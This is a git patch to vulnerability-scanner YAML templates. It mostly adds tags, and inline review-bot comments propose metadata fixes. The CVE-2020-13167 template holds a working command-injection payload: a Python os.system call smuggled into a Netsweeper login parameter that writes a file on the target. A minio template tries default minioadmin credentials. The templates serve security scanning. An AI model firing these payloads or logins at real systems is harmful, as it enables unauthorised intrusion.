From bd24dc198e0988824f27886147c55cf1ca949c08 Mon Sep 17 00:00:00 2001 
From: sandeep Date: Thu, 9 Sep 2021 19:08:13 +0530 Subject: [PATCH] Coverage for all templates using tags --- cves/2020/CVE-2020-12800.yaml | 1 + cves/2020/CVE-2020-13167.yaml | 4 +++- cves/2021/CVE-2021-3377.yaml | 1 + default-logins/minio/minio-default-password.yaml | 12 ++++++++---- .../prometheus-exposed-panel.yaml | 6 ++++-- exposures/configs/yii-debugger.yaml | 6 +++++- exposures/tokens/generic/shoppable-token.yaml | 1 + misconfiguration/front-page-misconfig.yaml | 1 + technologies/artica-web-proxy-detect.yaml | 4 ++++ technologies/basic-auth-detection.yaml | 1 + technologies/bigip-config-utility-detect.yaml | 1 + technologies/burp-api-detect.yaml | 1 + technologies/cacti-detect.yaml | 1 + technologies/clockwork-php-page.yaml | 2 ++ technologies/cockpit-detect.yaml | 1 + technologies/dell/dell-idrac6-detect.yaml | 2 ++ technologies/dell/dell-idrac7-detect.yaml | 2 ++ technologies/dell/dell-idrac8-detect.yaml | 2 ++ technologies/dell/dell-idrac9-detect.yaml | 2 ++ technologies/favicon-detection.yaml | 1 + technologies/firebase-detect.yaml | 2 ++ technologies/google-storage.yaml | 1 + technologies/graphql-detect.yaml | 1 + technologies/graylog-api-browser.yaml | 1 + technologies/gunicorn-detect.yaml | 4 +++- technologies/harbor-detect.yaml | 2 ++ technologies/home-assistant.yaml | 1 + technologies/ilo-detect.yaml | 1 + technologies/jaspersoft-detect.yaml | 1 + technologies/jellyfin-detect.yaml | 4 ++++ technologies/jolokia.yaml | 3 +++ technologies/kibana-detect.yaml | 1 + technologies/kong-detect.yaml | 1 + technologies/liferay-portal-detect.yaml | 2 ++ technologies/linkerd-badrule-detect.yaml | 8 ++------ technologies/lotus-domino-version.yaml | 2 ++ technologies/metabase-detect.yaml | 4 ++++ technologies/mrtg-detect.yaml | 2 ++ technologies/netsweeper-webadmin-detect.yaml | 1 + technologies/nginx-version.yaml | 3 +++ technologies/nifi-detech.yaml | 3 +++ technologies/oidc-detect.yaml | 2 ++ technologies/openam-detection.yaml | 1 + 
technologies/pi-hole-detect.yaml | 3 +++ technologies/prtg-detect.yaml | 2 ++ technologies/redmine-cli-detect.yaml | 1 + technologies/s3-detect.yaml | 1 + technologies/shiro-detect.yaml | 6 +++++- technologies/springboot-actuator.yaml | 4 ++++ technologies/sql-server-reporting.yaml | 1 + technologies/telerik-fileupload-detect.yaml | 2 ++ technologies/terraform-detect.yaml | 2 ++ technologies/tomcat-detect.yaml | 8 +++++--- technologies/tor-socks-proxy.yaml | 2 ++ technologies/weblogic-detect.yaml | 1 + technologies/werkzeug-debugger-detect.yaml | 1 + vulnerabilities/lsoft/listserv_maestro_rce.yaml | 1 + .../other/cacti-weathermap-file-write.yaml | 1 + .../other/caucho-resin-info-disclosure.yaml | 1 + vulnerabilities/other/pmb-local-file-disclosure.yaml | 1 + vulnerabilities/other/vpms-auth-bypass.yaml | 2 +- vulnerabilities/other/zms-auth-bypass.yaml | 1 + 62 files changed, 124 insertions(+), 20 deletions(-) rename {technologies => exposed-panels}/prometheus-exposed-panel.yaml (65%) diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml index 4a4a96bb69..8216d0e966 100644 --- a/cves/2020/CVE-2020-12800.yaml +++ b/cves/2020/CVE-2020-12800.yaml @@ -6,6 +6,7 @@ info: severity: critical description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. reference: https://github.com/amartinsec/CVE-2020-12800 + tags: cve,cve2020,wordpress,wp-plugin requests: - raw: diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index ffe6eb67a4..961d153f44 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml 
@@ -9,13 +9,15 @@ info: reference: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says + additional-fields: + hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' requests: - method: GET path: - # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/out" + headers: Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 77ded129f4..1b44686e3e 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -8,6 +8,7 @@ info: - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 author: geeknik severity: medium + tags: cve,cve2021,xss,npm requests: - raw: diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml index 7d2b90fde6..12c46a6efe 100644 --- a/default-logins/minio/minio-default-password.yaml +++ b/default-logins/minio/minio-default-password.yaml 
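Review bot: The new `additional-fields.hex-payload` entry under `info` records the decoded command but not what it is, so a reader still has to work out that it is the hex-decoded argument embedded in the `unixlogin.php` path and that the second request fetches the file it writes. Since the value is now template metadata rather than a comment, a `description` would serve better, e.g. `description: Pre-auth RCE in the Netsweeper webadmin unixlogin.php endpoint; the probe writes a marker file to /usr/local/netsweeper/webadmin/out and then requests it, so a successful run leaves that file on the target.` Because the template modifies the target filesystem, it should also carry the repository's `intrusive` tag if this revision already uses that convention, so operators can exclude it by tag. The rest of the `info` block, including any existing `tags` line, is outside this hunk.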
@@ -4,23 +4,27 @@ info: name: Minio Default Password author: pikpikcu severity: medium + tags: default-login,minio requests: - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}' - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}' + matchers-condition: and matchers: diff --git a/technologies/prometheus-exposed-panel.yaml b/exposed-panels/prometheus-exposed-panel.yaml similarity index 65% rename from technologies/prometheus-exposed-panel.yaml rename to exposed-panels/prometheus-exposed-panel.yaml index b107509968..2cda5cc379 100644 --- a/technologies/prometheus-exposed-panel.yaml +++ b/exposed-panels/prometheus-exposed-panel.yaml @@ -1,9 +1,11 @@ id: prometheus-exposed-panel + info: name: Prometheus.io exposed panel author: organiccrap severity: low - # usually runs on port http/9090 + tags: panel,prometheus + requests: - method: GET path: @@ -12,4 +14,4 @@ requests: matchers: - type: word words: - - Prometheus Time Series Collection and Processing Server + - 'Prometheus Time Series Collection and Processing Server' \ No newline at end of file diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml index 11232d47b1..e93bfbf58e 100644 --- a/exposures/configs/yii-debugger.yaml +++ b/exposures/configs/yii-debugger.yaml 
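Review bot: The quoted matcher word on the new side of the second hunk is followed by `\ No newline at end of file` while the removed line was not, so the rename also strips the file's trailing newline; the same regression appears in technologies/gunicorn-detect.yaml (`- Server` in its second hunk). Re-add the final newline in both files so yamllint's new-line-at-end-of-file check passes. The first hunk also drops the `# usually runs on port http/9090` comment without carrying the hint anywhere; if it is still accurate, keep it under `info` as `description: Prometheus web UI, usually served on port 9090.`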
@@ -4,7 +4,8 @@ info: name: View Yii Debugger Information author: geeknik reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ - severity: info + severity: low + tags: yii,debug,exposure requests: - method: GET @@ -16,11 +17,14 @@ requests: - "{{BaseURL}}/sapi/debug/default/view" redirects: true + max-redirects: 2 + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Yii Debugger" diff --git a/exposures/tokens/generic/shoppable-token.yaml b/exposures/tokens/generic/shoppable-token.yaml index 0f68803be2..0c3d4080a0 100644 --- a/exposures/tokens/generic/shoppable-token.yaml +++ b/exposures/tokens/generic/shoppable-token.yaml @@ -5,6 +5,7 @@ info: author: philippedelteil severity: info reference: https://ask.shoppable.com/knowledge/quick-start-api-guide + tags: exposure,shoppable,token requests: - method: GET diff --git a/misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml index 7e982772b0..8d49471b46 100644 --- a/misconfiguration/front-page-misconfig.yaml +++ b/misconfiguration/front-page-misconfig.yaml @@ -5,6 +5,7 @@ info: author: JTeles,pikpikcu severity: info reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications + tags: misconfig,exposure,frontpage requests: - method: GET diff --git a/technologies/artica-web-proxy-detect.yaml b/technologies/artica-web-proxy-detect.yaml index 82b19cfb2d..8fd487f5ee 100644 --- a/technologies/artica-web-proxy-detect.yaml +++ b/technologies/artica-web-proxy-detect.yaml @@ -1,18 +1,22 @@ id: artica-web-proxy-detect + info: name: Artica Web Proxy Detect author: dwisiswant0 severity: info + tags: tech,artica,proxy requests: - method: GET path: - "{{BaseURL}}/fw.login.php" + matchers-condition: and matchers: - type: word words: - "Welcome to the Artica Web Administration Interface" + - type: status status: - 200 \ No newline at end of file 
diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml index 66132d212e..894c3892d0 100644 --- a/technologies/basic-auth-detection.yaml +++ b/technologies/basic-auth-detection.yaml @@ -4,6 +4,7 @@ info: name: Basic auth detection author: w4cky_ severity: info + tags: tech,basic-auth requests: - method: GET diff --git a/technologies/bigip-config-utility-detect.yaml b/technologies/bigip-config-utility-detect.yaml index 4d3c250775..78b2741369 100644 --- a/technologies/bigip-config-utility-detect.yaml +++ b/technologies/bigip-config-utility-detect.yaml @@ -4,6 +4,7 @@ info: name: BIG-IP Configuration Utility detected author: dwisiswant0 severity: info + tags: tech,bigip requests: - method: GET diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml index 68a7000ee7..10cc8bcac8 100644 --- a/technologies/burp-api-detect.yaml +++ b/technologies/burp-api-detect.yaml @@ -5,6 +5,7 @@ info: author: joanbono severity: info reference: https://portswigger.net/burp/documentation/enterprise/api-reference + tags: burp,tech requests: - method: GET diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml index 0a2a721928..9d1d018f12 100644 --- a/technologies/cacti-detect.yaml +++ b/technologies/cacti-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: Cacti is a complete network graphing solution -- https://www.cacti.net/ severity: info + tags: tech,cacti requests: - method: GET diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml index 89ef10ba1b..a8537a2f36 100644 --- a/technologies/clockwork-php-page.yaml +++ b/technologies/clockwork-php-page.yaml @@ -1,9 +1,11 @@ id: clockwork-php-page + info: name: Clockwork PHP page exposure author: organiccrap severity: high reference: https://twitter.com/damian_89_/status/1250721398747791360 + tags: tech,clockwork requests: - method: GET 
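Review bot: `tags: burp,tech` puts the category tag last, whereas every other technologies/ template in this patch starts with `tech,` (technologies/s3-detect.yaml has the same issue with `aws,s3,bucket,tech`). Tag order does not affect filtering, but a consistent `tech,<product>` layout keeps the metadata greppable; use `tags: tech,burp` here and `tags: tech,aws,s3,bucket` there.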
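Review bot: `tags: tech,clockwork` classifies this template as a technology fingerprint, but its own `name` is "Clockwork PHP page exposure" and it carries `severity: high`, which is an exposure finding rather than detection. For consistency with exposures/configs/yii-debugger.yaml in this same patch (`tags: yii,debug,exposure`), add the exposure tag: `tags: tech,clockwork,exposure`.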
diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml index 30bf745acc..81dd323dc8 100644 --- a/technologies/cockpit-detect.yaml +++ b/technologies/cockpit-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Agentejo Cockpit author: dwisiswant0 severity: info + tags: tech,cockpit requests: - method: GET diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml index 9d8bb598ff..6f3c118b88 100644 --- a/technologies/dell/dell-idrac6-detect.yaml +++ b/technologies/dell/dell-idrac6-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac6-detect + info: name: Detect Dell iDRAC6 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml index bddc00552b..220cfc4503 100644 --- a/technologies/dell/dell-idrac7-detect.yaml +++ b/technologies/dell/dell-idrac7-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac7-detect + info: name: Detect Dell iDRAC7 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml index e25dc371e6..2fd72b97aa 100644 --- a/technologies/dell/dell-idrac8-detect.yaml +++ b/technologies/dell/dell-idrac8-detect.yaml 
@@ -1,9 +1,11 @@ id: dell-idrac8-detect + info: name: Detect Dell iDRAC8 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml index 7677292de5..f339b04905 100644 --- a/technologies/dell/dell-idrac9-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac9-detect + info: name: Detect Dell iDRAC9 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 7394c9fff3..3cf1e620d8 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -10,6 +10,7 @@ info: - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - https://github.com/devanshbatham/FavFreak - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + tags: tech,favicon requests: - method: GET diff --git a/technologies/firebase-detect.yaml b/technologies/firebase-detect.yaml index fe3ff98b30..5c22ef8819 100644 --- a/technologies/firebase-detect.yaml +++ b/technologies/firebase-detect.yaml @@ -5,11 +5,13 @@ info: author: organiccrap severity: low reference: http://ghostlulz.com/google-exposed-firebase-database/ + tags: tech,firebase requests: - method: GET path: - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" + matchers: - type: word words: 
diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml index 27f4814a5b..95963c6a8c 100644 --- a/technologies/google-storage.yaml +++ b/technologies/google-storage.yaml @@ -4,6 +4,7 @@ info: name: Google Bucket detection author: 0xTeles severity: info + tags: tech,gstorage,google,bucket requests: - method: GET diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index ef649b7d06..53d67b1326 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -4,6 +4,7 @@ info: name: GraphQL API Detection author: NkxxkN,ELSFA7110 severity: info + tags: tech,graphql requests: - method: POST diff --git a/technologies/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml index 6c93a114fa..98799a87c0 100644 --- a/technologies/graylog-api-browser.yaml +++ b/technologies/graylog-api-browser.yaml @@ -4,6 +4,7 @@ info: name: Detect Graylog REST API author: PR3R00T severity: info + tags: tech,graylog requests: - method: GET diff --git a/technologies/gunicorn-detect.yaml b/technologies/gunicorn-detect.yaml index 69f286e77b..56f5080384 100644 --- a/technologies/gunicorn-detect.yaml +++ b/technologies/gunicorn-detect.yaml @@ -1,9 +1,11 @@ id: gunicorn-detect + info: name: Detect Gunicorn Server author: joanbono description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn severity: info + tags: tech,gunicorn requests: - method: GET @@ -22,4 +24,4 @@ requests: - type: kval part: header kval: - - Server + - Server \ No newline at end of file diff --git a/technologies/harbor-detect.yaml b/technologies/harbor-detect.yaml index e082b48acf..1ede65a8df 100644 --- a/technologies/harbor-detect.yaml +++ b/technologies/harbor-detect.yaml @@ -1,8 +1,10 @@ id: harbor-detect + info: name: Harbor Detect author: pikpikcu severity: info + tags: tech,harbor requests: - method: GET 
diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml index 0522fc067b..dfb82e44b7 100644 --- a/technologies/home-assistant.yaml +++ b/technologies/home-assistant.yaml @@ -4,6 +4,7 @@ info: name: Detect Home Assistant author: fabaff severity: info + tags: tech,iot requests: - method: GET diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 70f0fc1e8d..6eeff924eb 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -5,6 +5,7 @@ info: author: milo2012 severity: info description: Version of HP iLO + tags: tech,ilo requests: - method: GET diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml index 7cafc9a84d..e26ad12b3f 100644 --- a/technologies/jaspersoft-detect.yaml +++ b/technologies/jaspersoft-detect.yaml @@ -4,6 +4,7 @@ info: name: Jaspersoft detected author: koti2 severity: info + tags: tech,jaspersoft requests: - method: GET diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml index ae031c20ca..9b31eaed43 100644 --- a/technologies/jellyfin-detect.yaml +++ b/technologies/jellyfin-detect.yaml @@ -4,6 +4,7 @@ info: name: Jellyfin detected author: dwisiswant0 severity: info + tags: tech,jellyfin requests: - method: GET @@ -13,6 +14,8 @@ requests: - "{{BaseURL}}/index.html" - "{{BaseURL}}/web/index.html" - "{{BaseURL}}/web/manifest.json" + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -22,6 +25,7 @@ requests: - "The Free Software Media System" condition: or part: body + - type: status status: - 200 diff --git a/technologies/jolokia.yaml b/technologies/jolokia.yaml index f6b28ff6ad..957b898273 100644 --- a/technologies/jolokia.yaml +++ b/technologies/jolokia.yaml @@ -4,11 +4,13 @@ info: name: Jolokia Version Disclosure author: mavericknerd,dwisiswant0 severity: info + tags: tech,jolokia requests: - method: GET path: - '{{BaseURL}}/jolokia/version' + matchers-condition: and matchers: - type: word 
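Review bot: `tags: tech,iot` carries no product-specific tag, so a run filtered on the product name cannot select this template while its siblings (`tech,kibana`, `tech,jellyfin`, and so on) can. Add one, e.g. `tags: tech,iot,homeassistant`.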
@@ -17,6 +19,7 @@ requests: - '"protocol":' - '"agent":' condition: and + - type: status status: - 200 diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml index c35b4dd301..c64939b6df 100644 --- a/technologies/kibana-detect.yaml +++ b/technologies/kibana-detect.yaml @@ -4,6 +4,7 @@ info: name: Kibana Service Detection author: petruknisme severity: info + tags: tech,kibana requests: - method: GET diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index 6164d7c1cd..39e4d58bb7 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: The Cloud-Native API Gateway - https://github.com/Kong/kong severity: info + tags: tech,kong requests: - method: GET diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml index ebf42ab88b..2a8de63c94 100644 --- a/technologies/liferay-portal-detect.yaml +++ b/technologies/liferay-portal-detect.yaml @@ -1,9 +1,11 @@ id: liferay-portal-detect + info: name: Liferay Portal Detection author: organiccrap,dwisiswant0 severity: info reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE + tags: tech,liferay requests: - method: GET diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml index 5e445af239..0e1ef8ff57 100644 --- a/technologies/linkerd-badrule-detect.yaml +++ b/technologies/linkerd-badrule-detect.yaml @@ -1,15 +1,11 @@ id: linkerd-badrule-detect -# Detect the Linkerd service by overriding the delegation table with an invalid -# rule, the presence of the service is indicated by either: -# - a "Via: .. linkerd .." -# - a "l5d-err" and/or a "l5d-success" header -# - a literal error in the body - info: name: Linkerd detection via bad rule author: dudez severity: info + tags: tech,linkerd + reference: https://linkerd.io requests: - method: GET 
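Review bot: The hunk deletes the five-line header comment that explained how the detection works (an invalid delegation rule, signalled by a `Via: .. linkerd ..` header, an `l5d-err`/`l5d-success` header, or a literal error in the body) and replaces it only with `reference: https://linkerd.io`, which says nothing about the technique. Keep that rationale as metadata, e.g. `description: Detects Linkerd by overriding the delegation table with an invalid rule; presence is indicated by a Via header naming linkerd, an l5d-err or l5d-success response header, or a literal error in the body.` The matchers the comment described are outside this hunk. Every other template in this patch also lists `tags` as the last key of `info`; placing `reference` after `tags` here breaks that ordering.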
diff --git a/technologies/lotus-domino-version.yaml b/technologies/lotus-domino-version.yaml index 3af4529ee9..897d6fad2e 100644 --- a/technologies/lotus-domino-version.yaml +++ b/technologies/lotus-domino-version.yaml @@ -1,8 +1,10 @@ id: lotus-domino-version + info: name: Lotus Domino Version Extractor author: CasperGN severity: info + tags: tech,lotus requests: - method: GET path: diff --git a/technologies/metabase-detect.yaml b/technologies/metabase-detect.yaml index 2b8c4cec7d..3a865ab0e7 100644 --- a/technologies/metabase-detect.yaml +++ b/technologies/metabase-detect.yaml @@ -1,13 +1,17 @@ id: metabase-version-detect + info: name: Detect Metabase Version author: revblock description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source severity: info + tags: tech,metabase + requests: - method: GET path: - "{{BaseURL}}/auth/login" + matchers-condition: and matchers: diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml index 19a062f6fa..96f95f15d6 100644 --- a/technologies/mrtg-detect.yaml +++ b/technologies/mrtg-detect.yaml @@ -1,9 +1,11 @@ id: mrtg-detect + info: name: Detect MRTG author: geeknik description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ severity: info + tags: tech,mrtg requests: - method: GET diff --git a/technologies/netsweeper-webadmin-detect.yaml b/technologies/netsweeper-webadmin-detect.yaml index cc107c6ddc..04b545b315 100644 --- a/technologies/netsweeper-webadmin-detect.yaml +++ b/technologies/netsweeper-webadmin-detect.yaml @@ -4,6 +4,7 @@ info: name: Netsweeper WebAdmin detected author: dwisiswant0 severity: info + tags: tech,netsweeper requests: - method: GET diff --git a/technologies/nginx-version.yaml b/technologies/nginx-version.yaml index 9674f616ed..302d5d3d19 100644 --- a/technologies/nginx-version.yaml +++ b/technologies/nginx-version.yaml 
@@ -1,9 +1,12 @@ id: nginx-version + info: name: nginx version detect author: philippedelteil description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. severity: info + tags: tech,nginx + requests: - method: GET path: diff --git a/technologies/nifi-detech.yaml b/technologies/nifi-detech.yaml index 8e593cc440..837e4c43fd 100644 --- a/technologies/nifi-detech.yaml +++ b/technologies/nifi-detech.yaml @@ -4,6 +4,7 @@ info: name: Apache NiFi detect author: dwisiswant0 severity: info + tags: tech,apache,nifi requests: - method: GET @@ -15,6 +16,7 @@ requests: - "{{BaseURL}}/flow/registries" - "{{BaseURL}}/system-diagnostics" - "{{BaseURL}}/nifi-api/access/config" + matchers-condition: and matchers: - type: regex @@ -22,6 +24,7 @@ requests: - "supportsLogin" - "disconnectedNodeAcknowledged" - "(aggregate|node)Snapshots?" + - type: status status: - 200 diff --git a/technologies/oidc-detect.yaml b/technologies/oidc-detect.yaml index d8f65083d7..f87bf320d2 100644 --- a/technologies/oidc-detect.yaml +++ b/technologies/oidc-detect.yaml @@ -1,9 +1,11 @@ id: oidc-detect + info: name: Detect OpenID Connect provider author: jarijaas severity: info description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect + tags: tech,oidc requests: - method: GET diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml index b3c603dde0..fd1653f20f 100644 --- a/technologies/openam-detection.yaml +++ b/technologies/openam-detection.yaml @@ -4,6 +4,7 @@ info: name: Detect OpenAM and OpenSSO author: philippedelteil severity: info + tags: tech,openam requests: - method: GET diff --git a/technologies/pi-hole-detect.yaml b/technologies/pi-hole-detect.yaml index 0f5cbcb052..22d1a56dca 100644 --- a/technologies/pi-hole-detect.yaml +++ b/technologies/pi-hole-detect.yaml 
@@ -1,8 +1,10 @@ id: pi-hole-detect + info: name: pi-hole detector author: geeknik severity: info + tags: tech,pihole requests: - method: GET @@ -14,6 +16,7 @@ requests: - type: status status: - 200 + - type: word words: - "Pi-hole" diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml index c57d90484d..c630eff289 100644 --- a/technologies/prtg-detect.yaml +++ b/technologies/prtg-detect.yaml @@ -1,9 +1,11 @@ id: prtg-detect + info: name: Detect PRTG author: geeknik description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg severity: info + tags: tech,prtg requests: - method: GET diff --git a/technologies/redmine-cli-detect.yaml b/technologies/redmine-cli-detect.yaml index 24a02349aa..8cb08b7888 100644 --- a/technologies/redmine-cli-detect.yaml +++ b/technologies/redmine-cli-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ severity: info + tags: tech,redmine requests: - method: GET diff --git a/technologies/s3-detect.yaml b/technologies/s3-detect.yaml index fe617373af..3ed37bb68e 100644 --- a/technologies/s3-detect.yaml +++ b/technologies/s3-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info + tags: aws,s3,bucket,tech requests: - method: GET diff --git a/technologies/shiro-detect.yaml b/technologies/shiro-detect.yaml index 321f556a03..8353c48494 100644 --- a/technologies/shiro-detect.yaml +++ b/technologies/shiro-detect.yaml @@ -1,16 +1,20 @@ id: shiro-detect + info: name: Detect Shiro Framework author: AresX severity: info + tags: tech,shiro + requests: - method: GET path: - '{{BaseURL}}' headers: Cookie: rememberMe=123; + matchers: - type: word words: - - rememberMe=deleteMe + - 'rememberMe=deleteMe' part: header \ No newline at end of file 
diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml index 6bc4c9e7a1..ebc7edbe1e 100644 --- a/technologies/springboot-actuator.yaml +++ b/technologies/springboot-actuator.yaml @@ -4,13 +4,17 @@ info: name: Detect Springboot Actuators author: that_juan_,dwisiswant0,wdahlenb severity: info + tags: tech,springboot,actuator requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/actuator" - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/actuator/favicon.ico" + stop-at-first-match: true matchers-condition: or matchers: - type: word diff --git a/technologies/sql-server-reporting.yaml b/technologies/sql-server-reporting.yaml index 5b08ec1032..4b64c61e6f 100644 --- a/technologies/sql-server-reporting.yaml +++ b/technologies/sql-server-reporting.yaml @@ -4,6 +4,7 @@ info: name: Detect Microsoft SQL Server Reporting author: puzzlepeaches severity: info + tags: tech,micrsoft requests: - method: GET diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml index 810cef7a8b..8f150d8b40 100644 --- a/technologies/telerik-fileupload-detect.yaml +++ b/technologies/telerik-fileupload-detect.yaml @@ -4,11 +4,13 @@ info: name: Detect Telerik Web UI fileupload handler author: organiccrap severity: info + tags: tech,telerik requests: - method: GET path: - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" + matchers: - type: word words: diff --git a/technologies/terraform-detect.yaml b/technologies/terraform-detect.yaml index 8c4d3307df..4a458c77e2 100644 --- a/technologies/terraform-detect.yaml +++ b/technologies/terraform-detect.yaml @@ -1,9 +1,11 @@ id: terraform-detect + info: name: Detect Terraform Provider author: geeknik description: Write Infrastructure as Code - https://www.terraform.io/ severity: info + tags: tech,terraform requests: - method: GET diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml index d5a164932d..5561dba63d 100644 
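Review bot: The added `- "{{BaseURL}}"` path combined with the existing `matchers-condition: or` means a match on the site root alone now reports Spring Boot Actuator, so the false-positive rate depends entirely on how specific the word matchers below are; those matchers are outside the hunk, so please confirm they only contain actuator-specific strings. Because the root path is listed first and `stop-at-first-match: true` is also added, a root match will short-circuit the more specific `/actuator` probe. A comment on the new line stating why the root is probed would make the intent reviewable.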
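Review bot: `tags: tech,micrsoft` misspells the vendor, so tag-based filtering on `microsoft` will silently skip this template. Change it to `tags: tech,microsoft`.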
